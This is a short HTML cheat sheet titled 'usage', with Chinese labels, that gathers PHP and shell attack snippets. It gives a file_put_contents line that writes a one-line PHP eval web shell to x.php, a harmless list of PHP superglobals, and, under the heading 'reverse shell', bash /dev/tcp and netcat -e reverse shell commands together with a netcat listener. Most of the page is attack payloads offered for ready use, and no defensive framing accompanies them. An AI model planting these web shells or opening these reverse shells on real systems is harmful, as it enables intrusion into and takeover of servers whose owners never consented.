<!DOCTYPE html>
<html>
<head>
    <title>usage</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <style type="text/css">
        div{width: 90%;margin: auto;margin-top: 20px; font-size: 14px;}
        li{height: auto;width: 100%;background-color: #EEEEEE;
        list-style-type: none;border: 1px solid #B3B3B3;
        padding: 6px 6px 6px 6px;}
    </style>
</head>
<body>
<div>
    <h2>some usage:</h2>
    <ul>
        <h4>1.file_put_contents</h4>
        <li>
            file_put_contents("x.php","<?php @eval($_POST[a]); ?>");   post a=$_POST[hack]</br>
            file_put_contents

        </li>

    </ul>
    <ul>
        <h4>2.全局变量[global]</h4>
        <li>
            $GLOBALS    ->  引用全局作用域中可用的全部变量</br>
            $_POST      ->  获取 post 数据，是一个字典</br>
            $_GET       ->  获取 get 数据，是一个字典</br>
            $_COOKIE    ->  获取 cookie</br>
            $_SESSION   ->  获取 session</br>
            $_FILES     ->  获取上传的文件</br>
            $_REQUEST   ->  获取 $_GET，$_POST，$_COOKIE 中的数据</br>
            $_ENV       ->  环境变量</br>
            $_SERVER    ->  服务器和执行环境信息</br>
        </li>
    </ul>
    <ul>
        <h4>3.反弹 shell</h4>
        <li>
            server: bash -i >& /dev/tcp/target/port 0>&1</br>
            server: nc -e /bin/bash ip port</br>
            client: nc -lvp port</br>
        </li>
    </ul>

</div>
</body>
</html>